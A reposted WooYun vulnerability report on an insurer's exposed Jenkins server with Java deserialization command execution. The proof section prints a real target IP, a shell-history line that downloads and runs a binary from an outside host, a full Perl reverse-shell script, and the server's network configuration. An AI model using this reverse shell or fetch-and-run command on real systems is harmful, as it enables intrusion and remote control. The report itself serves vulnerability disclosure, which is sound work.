华夏保险某系统命令执行/涉及多个项目源码/(发现疑似后门)

admin
admin
admin
140489
文章
117
评论
2017年4月1日07:30:21评论299 views字数 224阅读0分44秒阅读模式
摘要

2016-03-24: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-04-03: 细节向核心白帽子及相关领域专家公开
2016-04-13: 细节向普通白帽子公开
2016-04-23: 细节向实习白帽子公开
2016-05-08: 细节向公众公开

漏洞概要 关注数(1) 关注此漏洞

缺陷编号: WooYun-2016-188540

漏洞标题: 华夏保险某系统命令执行/涉及多个项目源码/(发现疑似后门)

相关厂商: hxlife.com

漏洞作者: 路人甲

提交时间: 2016-03-24 14:04

公开时间: 2016-05-08 14:15

漏洞类型: 命令执行

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行 补丁不及时

2人收藏

漏洞详情

披露状态:

2016-03-24: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-04-03: 细节向核心白帽子及相关领域专家公开
2016-04-13: 细节向普通白帽子公开
2016-04-23: 细节向实习白帽子公开
2016-05-08: 细节向公众公开

简要描述:

详细说明:

mask 区域 
1.http://**.**.**
 *****+java反序*****
 2.http://**.**.**/job/site_
 *****b389ce24b076ab6197cd.png&qu*****
 **********
 *****41a96ff6218513e0560f.png&qu*****
 *****e01fd350f5d6ce85ae5d.png&qu*****
 **********
 *****经让*****
 **********
 *****sh_history *****
 **********
 *****gt;ps*****
 ***** 9 2*****
 *****-P /tmp/;cd /tmp;chmo*****
 *****t
 *****
 *****de&g*****
 3.http://**.**.**/_
 *****家都*****
 *****1260d1fb309cea21cc7e.png&qu*****
 *****i.p*****
 **********
 *****usr/bin/*****
 ***** 
 *****
 ***** *****
 *****ict;*****
 *****ket;*****
 *****andle*****
 ***** *****
 ***** != 2)*****
 *****Remote_IP Remot*****
 *****exit *****
 ***** 
 *****
 ***** *****
 ***** = $ARG*****
 ***** = $ARGV*****
 ***** *****
 *****ame("tc*****
 *****mote_port, inet_*****
 ***** *****
 *****bin/bash -*****
 ***** *****
 ***** SOCK_STREA*****
 ***** *****
 *****toflush*****
 *****toflus*****
 ***** *****
 ***** "can not c*****
 ***** *****
 *****lt;&SO*****
 *****>&S*****
 *****>&S*****
 ***** *****
 *****hell./n"*****
 ***** *****
 *****hell)*****
 *****OCK;*****
 ***** *****
 *****;/code*****
 **********
 *****fig*****
 *****BROADCAST,RUNNING,*****
 *****255.255.248.0  br*****
 *****5e  txqueuelen *****
 *****40  bytes 6712*****
 *****opped 0  ove*****
 *****82  bytes 539*****
 *****overruns 0  carr*****
 **********
 *****AST,RUNNING,MUL*****
 ***** 255.255.252.0  br*****
 *****53  txqueuelen *****
 *****  bytes 3160030*****
 *****opped 0  ove*****
 *****  bytes 17078979*****
 *****overruns 0  carr*****
 **********
 *****BACK,RUNNING*****
 *****0.1  netma*****
 *****len 0  (Loc*****
 *****9  bytes 4137*****
 *****opped 0  ove*****
 *****9  bytes 4137*****
 *****overruns 0  carr*****
 **********
 *****de&g*****
 *****么*****

漏洞证明:

http://123.57.39.190

jenkins 项目未授权访问+java反序列化命令执行

http://123.57.39.190:8080/job/site

华夏保险某系统命令执行/涉及多个项目源码/(发现疑似后门)

华夏保险

华夏保险某系统命令执行/涉及多个项目源码/(发现疑似后门)

华夏保险某系统命令执行/涉及多个项目源码/(发现疑似后门)

好像这个系统已经让人插了后门

cat /home/cms_int/.bash_history 最后几行

code 区域 
ps ax
 kill -s 9 26927
 wget http://120.192.246.90:6546/2huizhen -P /tmp/;cd /tmp;chmod 777 2huizhen;./2huizhen
 exit

http://120.192.246.90:6546/

这几个工具 大家都懂的。

华夏保险某系统命令执行/涉及多个项目源码/(发现疑似后门)

weiwei.pl

code 区域 
#!/usr/bin/perl -w   
 #   
   
 use strict;   
 use Socket;   
 use IO::Handle;   
   
 if($#ARGV+1 != 2){   
        print "$#ARGV $0 Remote_IP Remote_Port /n";   
          exit 1;   
 }   
   
 my $remote_ip = $ARGV[0];   
 my $remote_port = $ARGV[1];   
   
 my $proto = getprotobyname("tcp");   
 my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));   
   
 my $shell = '/bin/bash -i';   
   
 socket(SOCK, AF_INET, SOCK_STREAM, $proto);   
   
 STDOUT->autoflush(1);   
 SOCK->autoflush(1);   
   
 connect(SOCK,$pack_addr) or die "can not connect:$!";   
   
 open STDIN, "<&SOCK";   
 open STDOUT, ">&SOCK";   
 open STDERR, ">&SOCK";   
   
 print "Enjoy the shell./n";             
   
 system($shell);   
 close SOCK;   
   
 exit 0;

ifconfig -a

code 区域 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 10.173.5.9  netmask 255.255.248.0  broadcast 10.173.7.255
         ether 00:16:3e:00:68:5e  txqueuelen 1000  (Ethernet)
         RX packets 1433800840  bytes 67121663795 (62.5 GiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 11861782  bytes 5397221371 (5.0 GiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
         inet 123.57.39.190  netmask 255.255.252.0  broadcast 123.57.39.255
         ether 00:16:3e:00:2e:53  txqueuelen 1000  (Ethernet)
         RX packets 7397850480  bytes 316003053060 (294.3 GiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 325398474883  bytes 170789798721155 (155.3 TiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
 lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
         inet 127.0.0.1  netmask 255.0.0.0
         loop  txqueuelen 0  (Local Loopback)
         RX packets 7195279  bytes 4137380599 (3.8 GiB)
         RX errors 0  dropped 0  overruns 0  frame 0
         TX packets 7195279  bytes 4137380599 (3.8 GiB)
         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

就证明这么多。。

修复方案:

jenkins java反序列化命令执行

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-03-24 14:15

厂商回复:

处理中

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-24 14:20 | j14n ( 普通白帽子 | Rank:2226 漏洞数:401 )

    1

    嘿嘿 ,真快

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin